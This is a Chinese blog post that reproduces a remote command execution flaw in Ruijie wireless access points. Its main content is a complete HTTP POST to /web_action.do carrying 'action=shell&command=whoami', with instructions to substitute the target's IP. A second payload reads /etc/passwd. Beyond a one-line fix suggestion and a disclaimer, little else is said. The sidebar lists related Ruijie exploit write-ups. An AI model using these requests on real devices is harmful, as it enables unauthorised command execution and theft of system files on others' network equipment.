锐捷无线AP命令执行

已于 2023-06-21 17:56:32 修改
阅读量1.3k 收藏 1
点赞数 2
分类专栏: 经验分享 渗透测试 网络安全 文章标签: web安全 渗透测试 安全
于 2022-11-14 09:44:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44828901/article/details/127841647
版权
警告:本文所涉及内容只可用于交流学习,请勿使用本文提到的内容违反法律,本文和作者不提供任何担保!!!

一、漏洞信息

此漏洞是因为锐捷无线路由未对数据包中的敏感参数做过滤,可直接利用action参数,导致RCE。

二、漏洞复现

漏洞url:http://123.123.123.123/web_action.do

使用下面的数据包,更改host为目标ip,Referer不用改

​

POST /web_action.do HTTP/1.1

Host: 123.123.123.123

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

Accept: text/plain, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://x.x.x.x/

Content-Length: 29

Cookie: LOCAL_LANG_COOKIE=zh; UI_LOCAL_COOKIE=zh; SID=F23E18BDA014D308240A53206BEAD58; login=1; mac=0074.9c2b.472c; oid=

Connection: close

action=shell&command=whoami
​

 发现回显,漏洞存在。

使用第二个poc查看信息。

 Poc2: action=shell&command=cat+/etc/passwd

三、修复建议

 过滤相关参数

Kepler开普勒
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
锐捷Ruijie-UAC online_check.php 未授权远程代码命令执行漏洞】【漏洞复现】【漏洞poc】
weixin_43977052的博客
03-06 381
锐捷RG-UAC统一上网行为管理审计系统是星网锐捷网络有限公司自主研发的上网行为管理与审计产品。该系统可以部署在网络的关键节点上,通过路由、透明、旁路或混合模式,对数据进行2-7层的全面检查和分析。它深度识别、管控和审计数百种常见的应用,包括IM聊天软件、P2P下载软件、炒股软件、网络游戏应用、流媒体在线视频、移动应用、网络存储等。
CVE-2023-3450 锐捷Ruijie路由器命令执行漏洞复现
08-07 2728
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现
最新发布
2301_76437855的博客
06-11 433
锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期:2021-09-19漏洞编号:CNVD-2021-09650危害等级:高危漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
锐捷AP安装配置命令行以及升级固件合集
07-22
教程名称:锐捷AP安装配置命令行以及升级固件合集课程目录:【】RG-AP110-W无线接入点RGOS 10.4(1b19)p2软件版本升级固件【】RG-AP110-W无线设备RGOS11.1(5)B3软件版本【】RG-AP120-W无线设备RGOS11.1(5)B3软件版本【】RG-AP220-E FAT模式下AP的简单配置【】RG-AP220-E 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
锐捷无线AP720-I版本升级
Jian Sun_的博客
03-26 1180
7.一段时间后(时间包括AC传版本给AP的时间和AP的重启时间,其中AC将版本传给AP需要的时间跟ACAP的网络情况和带宽有关,AP重启时间大约3分钟左右),AP版本升级成功。设备的web管理页面,请先进行配置备份,以防万一。3.点击系统—系统升级—AP升级页面,点击左边的 更新软件版本,AC如果跟外网可达,会根据云服务器上的软件版本自动校验当前AC上在线AP的软件版本是否最新,如下。2.点击系统—系统升级—AP升级页面,将 AP自动升级 后面的开关打开,ON亮蓝色即是打开了。
Ruijie锐捷 | AC查看AP进行高效快速排错的命令
键盘爱好者
12-14 3565
由于802.11n有个特性是40M频宽,该频宽是通过以前的两个20M信道叠加起来后生成的,并且叠加时两信道一个是主信道一个是副信道,这里的plus和minus都是针对主信道说的,所以11na_ht40plus代表40M频宽时的2个信道叠加向上加的叠加,例如当前信道是149,配成40M频宽需要叠加另外一个信道,就是149+153两个信道组成的40MHz频宽,11na_ht40minus代表信道叠加时是向下减的叠加,例如配了这个,信道161,就等于是161+157组成了40M频宽的新信道。
锐捷x32pro(v1版)刷openwrt开启无线160MHz
热门推荐
大吉
05-24 2万+
好玩之处: 开启无线5G的160MHz 内网穿透 ddns opkg安装各种插件… 准备 windows终端软件 软件 tftpd64 winscp mobaxterm 刷机固件 固件 x32pro-initramfs.bin x32pro-sys.bin openwrt系统固件 x32pro-recovery-firmware.bin 原厂固件用于恢复 软件和固件下载地址 链接:https://pan.baidu.com/s/1hyAtwYcfw
锐捷交换机,路由器,ap命令行升级方式
03-27
锐捷作为国内知名的网络设备供应商,其产品线覆盖了交换机、路由器、无线接入点(AP)等多种类型。在实际运维过程中,通过命令行对这些设备进行软件版本的升级是一项常见且必要的操作。本文将详细介绍如何通过命令行...
锐捷网络无线局域网配置优化汇总.ppt
11-12
锐捷网络无线局域网配置优化汇总主要涵盖了多个方面,旨在提升无线网络的性能和稳定性。以下是这些配置方法的详细说明: 1. **信道规划**:为了减少同频和临频干扰,需要根据实际环境选择合适的信道,确保各AP间...
锐捷交换机产品实施一本通
07-18
这些交换机具有高性能、高密度端口和丰富的管理特性,支持PoE(Power over Ethernet)供电,便于部署IP电话、无线AP等设备。 三、配置与管理 "一本通"资料将涵盖以下内容: 1. **基础配置**:如何进行设备上电、...
AC直连fitap管理
12-01
AC直连fitap管理】涉及的是无线局域网(WLAN)的部署与管理,特别是集中控制器Access Controller,AC)对Fit型接入点(Fit AP)的配置。无线局域网是一种允许电子设备连接到一个无线局域网的技术,无需物理连接...
锐捷rg-ap520 原版胖瘦一体编程器固件
05-14
rg-ap520 qca9563 qca9882 ar8033方案 64M编程器固件 注意一下写flash时候 常见的编程器都不能正确读写64Mflash 包括但不限于341 xtw100等 真是个大坑啊
锐捷无线ACAP配置手册
08-05
星网锐捷无线交换机和无线AP配置手册,保函瘦模式和胖漠视。有典型实例
锐捷WLAN产品故障一本通
08-03
这份资料旨在帮助网络管理员和IT专业人员快速识别和处理在使用锐捷WLAN产品时遇到的问题,以确保网络的稳定运行和高效性能。 1. **WLAN基础知识**:理解WLAN的基础架构是解决问题的第一步。WLAN通常由接入点(AP)...
锐捷ACAP常用命令
weixin_53515901的博客
01-06 2060
AC(config-wlan)#wlan-basedper-user-limit up-streams average-data-rate 100burst-data-rate 100 //----->配置基于WLAN的限速,上行限速100KB/s。AC(config-ap)#ap-based per-user-limit up-streamsaverage-data-rate 256 burst-data-rate 256----->配置基于AP的限速。
锐捷AP设置限速(胖模式)
无心
03-09 2070
average-data-rate 表示设置平均速率限制,单位为 8Kbps ,范围为8-261120。burst-data-rate 表示设置突发速率限制,单位为 8Kbps ,范围为8-261120。average-data-rate 表示设置平均速率限制,单位为 8Kbps ,范围为8-261120。average-data-rate 表示设置平均速率限制,单位为 8Kbps ,范围为8-261120。
锐捷路由器命令执行漏洞(CVE-2023-3450)
xiaokp7的博客
09-13 913
RG-BCR860是锐捷网络推出的一款商业云路由器,它是专为酒店、餐饮、门店设计,适用带宽100Mbps,带机量可达150台,支持Sec VPM、内置安全审计模块,给商家带来更好的网络营销体验。该产品主支持全中文的WEB 界面配置,不再需要用传统的命令行进行配置,使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞,该漏洞源于组件Network Diagnostic Page存在问题,会导致操作系统命令注入。
漏洞复现】锐捷Ruijie-UAC online_check.php 命令注入漏洞
qq_67810151的博客
03-05 524
锐捷RG-UAC统一上网行为管理审计系统存在命令注入漏洞,未授权的攻击者可以通过该漏洞执行任意代码,控制服务器。
锐捷无线ap修改登录web界面密码命令
03-13
我可以回答这个问题。要修改锐捷无线AP登录web界面密码,可以使用以下命令: set user admin password <new_password> 其中,<new_password> 是你想要设置的新密码。请注意,这个命令需要在锐捷无线AP命令行界面中执行
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值